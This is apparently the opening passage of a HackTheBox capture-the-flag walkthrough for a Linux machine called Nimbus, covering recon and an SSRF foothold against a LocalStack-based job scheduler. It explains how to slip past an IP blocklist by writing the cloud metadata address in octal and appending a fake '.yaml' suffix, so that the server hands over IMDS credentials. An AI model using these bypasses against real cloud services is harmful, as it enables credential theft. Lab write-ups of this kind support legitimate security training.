OS: Linux · Difficulty: Hard · Theme: Cloud / AWS (LocalStack) misconfiguration

0. Setup & the MTU black-hole (do this first)

On the HTB VPN, tun0 defaults to MTU 1500 but the real path MTU to the target is ~1300. Oversized packets are silently dropped (no ICMP frag-needed), so small requests succeed while large ones hang forever. On the first solve a ~2.5 KB SQS send-message hung indefinitely while a tiny test went through instantly — pure MTU. Fix it up front so it never bites:

sudo ip link set dev tun0 mtu 1300

Confirm connectivity and set /etc/hosts:

echo "<TARGET_IP>  nimbus.htb aws.nimbus.htb" | sudo tee -a /etc/hosts

Tooling: awscli (sudo apt install -y awscli), tmux, curl, python3.

1. Recon

nmap

nmap -sC -sV -p22,80 <TARGET_IP>

22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Nimbus — Internal Job Scheduler

vhosts / web

curl -s -o /dev/null -w "%{http_code}\n" http://nimbus.htb/        # 200, "Nimbus — Internal Job Scheduler"
curl -s -o /dev/null -w "%{http_code}\n" http://aws.nimbus.htb/    # 403  -> LocalStack AWS API endpoint
curl -s -o /dev/null -w "%{http_code}\n" http://nimbus.htb/jobs/preview   # 405 -> needs POST

aws.nimbus.htb is discoverable via vhost fuzzing:

ffuf -u "http://nimbus.htb" -H "Host: FUZZ.nimbus.htb" \
     -w /usr/share/wordlists/dirb/big.txt -fs 178
# aws    [Status: 403, Size: 305]

2. Foothold — SSRF → IMDS credentials

POST /jobs/preview fetches a user-supplied url= server-side. The app:

• blocklists the literal IMDS IP 169.254.169.254, and
• applies a suffix filter expecting a .yaml-looking URL.

Bypass both:

• Encode the IMDS IP in octal: 169.254.169.254 → 0251.0376.0251.0376 (inet_aton accepts it; the string blocklist doesn't match).
• Append ?a=test.yaml so the suffix check passes while still hitting the IMDS path.